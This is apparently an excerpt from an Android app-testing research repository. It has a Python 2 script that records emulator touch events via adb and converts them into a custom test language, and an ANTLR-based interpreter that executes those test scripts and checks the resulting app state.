        child.kill()
    parent.kill()
def getTimestamp(line):
    """Extract the timestamp (seconds, float) from a ``getevent -lt`` line.

    Lines look like ``[   51880.941781] <device>: ...``; the second
    whitespace-separated token is ``<seconds>]``, so strip the trailing
    bracket before converting.
    """
    token = line.split()[1]
    return float(token[:-1])
# Path where the adb shell session below dumps the raw getevent stream.
shellFileName = "./outputFiles/out.txt"
# Mini auto script to start emulator recording via adb shell.
# NOTE(review): this drives a Windows cmd window via keystroke injection and
# uses an absolute machine-specific path — it only works on that one setup.
os.system("start cmd")
time.sleep(1)
pyautogui.typewrite('cd C:/Users/artur/PycharmProjects/AndroidTestingPy27/outputFiles')
pyautogui.press('enter')
# Open an adb shell whose output is redirected into out.txt ...
pyautogui.typewrite('adb shell > out.txt')
pyautogui.press('enter')
# ... and stream timestamped touch events from input device 1 into it.
pyautogui.typewrite('getevent -lt /dev/input/event1')
pyautogui.press('enter')
print "\n\n---> RECORDING...\n"
# Block until the operator finishes interacting with the emulator.
raw_input("Press a key to stop recording...\n")
# Script file that will receive the replayable CUSTOM SLEEP/DRAG commands.
outputScriptName = "./outputFiles/outputScript.txt"
outputScriptFile = open(outputScriptName, "w")
# Header expected by the custom-language interpreter.
outputScriptFile.write("When VIDEO app:\nIN PORTAL check for SAME state:\n")
# Parser state: "XXX" sentinels keep the read loop below running; times are
# in seconds, coordinates in (scaled) screen units.
line = "XXX"
status = "XXX"
initialTime = 0
finalTime = 0
initialX = 0
initialY = 0
currentX = 0
currentY = 0
# Translate the raw getevent dump into CUSTOM SLEEP / CUSTOM DRAG commands.
# ABS_MT_TRACKING_ID 00000000 marks finger-down, ffffffff marks finger-up;
# positions arrive as hex ABS_MT_POSITION_X/Y events in between.
with open(shellFileName) as fp:
    while line:
        # readline() returns '' at EOF, which ends the loop.
        line = fp.readline()
        # Start or end of a touch gesture.
        if "ABS_MT_TRACKING_ID" in line:
            if "00000000" in line:
                # Finger down: remember when the press started and reset the
                # gesture's starting coordinates.
                initialTime = getTimestamp(line)
                status = "DOWN"
                initialX = 0
                initialY = 0
                # If a previous gesture ended, emit the idle gap between the
                # two gestures as a SLEEP (milliseconds).
                if finalTime!=0:
                    delta = (initialTime - finalTime)
                    finalTime = 0
                    outputScriptFile.write("\tCUSTOM SLEEP " + str(delta*1000) + " ;\n")
                    print "INTRODUCED PAUSE OF " + str(delta) + " secs"
                print "PRESSING"
            elif "ffffffff" in line:
                # Finger up: the gesture lasted finalTime - initialTime secs.
                finalTime = getTimestamp(line)
                delta = (finalTime - initialTime)
                status = "UP"
                # Edge case: a tap with no position events before release —
                # fall back to the last known coordinates.
                if initialX == 0:
                    initialX = currentX
                if initialY == 0:
                    initialY = currentY
                # Emit the whole gesture as one DRAG (duration in ms).
                outputScriptFile.write("\tCUSTOM DRAG FROM " + str(initialX) + " " + str(initialY) + " TO " + str(currentX) + " " + str(currentY) + " DURATION " + str(delta*1000) + " ;\n")
                print "RELEASING after " + str(delta) + " secs"
        # Coordinate update events (values are hexadecimal).
        elif "ABS_MT_POSITION_X" in line:
            hex = line.split()[-1]
            currentX = int(hex, 16)
            # NOTE(review): 30.34 presumably maps raw touch units to the
            # emulator's screen coordinates — confirm against the device.
            currentX = currentX/30.34
            # First position event of the gesture fixes the start point.
            if initialX == 0:
                initialX = currentX
            print "X: " + str(currentX)
        elif "ABS_MT_POSITION_Y" in line:
            hex = line.split()[-1]
            currentY = int(hex, 16)
            # NOTE(review): 17.07 — same scaling assumption as for X.
            currentY = currentY/17.07
            if initialY == 0:
                initialY = currentY
            print "Y: " + str(currentY)
outputScriptFile.flush()
outputScriptFile.close()
| {"/graphPlotter.py": ["/stateNode.py"]} |
50,829 | ArtyZiff35/Android-Application-State-Graph-Model-Parser | refs/heads/master | /customLanguageInterpreter/mainInterpreter.py | import sys
from antlr4 import *
from scriptingLanguageLexer import scriptingLanguageLexer
from scriptingLanguageParser import scriptingLanguageParser
from scriptingLanguageListener import scriptingLanguageListener
from suiteClass import *
from activityStateDetector import activityStateDetector
import time
def executeTests(suiteObject, logisticRegr):
    """Run every test case in the parsed suite and print pass/fail per test.

    Each test dumps the starting UI state, executes its command list, then
    classifies the resulting activity with ``logisticRegr`` and compares it
    against the expected destination.
    """
    print "\n\n\n-------------------------------------------------------\n"
    print "Found " + str(len(suiteObject.testCasesList)) + " tests to be executed!\n"
    # Iterating through all of the tests
    for test in suiteObject.testCasesList:
        positiveResult = True
        # TODO Here we should be going to the state specified by the test
        # Making the initial dump for the starting state
        test.initDump()
        print "TEST: Found a command list of size: " + str(len(test.commandsList))
        # Now iterating through all commands of this test
        for command in test.commandsList:
            # SECURITY NOTE(review): eval() executes arbitrary Python built
            # by the script parser — fine for a local research tool, but
            # never feed it untrusted script files.
            result = eval(command)
            # A command returning False aborts the test immediately.
            if result==False:
                positiveResult = False
                break
            # Let one second go by after a command
            # time.sleep(1)
        # Checking the result of the test execution (only if everything up to now was ok)
        if positiveResult==True:
            # Classify the arrival activity ("SAME" means no state change).
            resultingState = test.finalStateCheck(logisticRegr)
            print "\nWe ended up in " + resultingState + " activity \n"
            # Comparing the arrival state with the expected state
            if test.sameDestination == True and resultingState != "SAME":
                positiveResult = False
            elif test.sameDestination == False and str(resultingState).lower() != str(test.endActivityType).lower():
                positiveResult = False
        # Printing out the outcome of the test
        if positiveResult == True:
            print "---> TEST PASSED!\n"
        else:
            print "---> TEST FAILED...\n"
def main(argv):
    """Parse the recorded script with ANTLR and execute the resulting suite.

    Pipeline: lex + parse ``outputScript.txt`` -> walk the parse tree with
    the listener to populate a suiteClass -> train the activity classifier
    -> run the tests.
    """
    # Input script produced by the event recorder.
    # input = FileStream("./input.txt")
    # NOTE(review): 'input' shadows the builtin of the same name — harmless
    # here but worth renaming in a future behavior-changing pass.
    input = FileStream("./../outputFiles/outputScript.txt")
    # Instantiating the Lexer
    lexer = scriptingLanguageLexer(input)
    stream = CommonTokenStream(lexer)
    # Instantiating the Parser
    parser = scriptingLanguageParser(stream)
    # Calling the ROOT rule of the parser (named after the top grammar rule)
    tree = parser.suite()
    # Container the listener fills with parsed test cases.
    suiteObject = suiteClass()
    # Walk the tree; the listener mutates suiteObject as a side effect.
    results = scriptingLanguageListener(suiteObject)
    walker = ParseTreeWalker()
    walker.walk(results, tree)
    # Preparing the Logistic Regression model used for state detection.
    logisticRegr = activityStateDetector.trainModel()
    # EXECUTING THE TESTS
    executeTests(suiteObject, logisticRegr)
if __name__ == '__main__':
    main(sys.argv)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.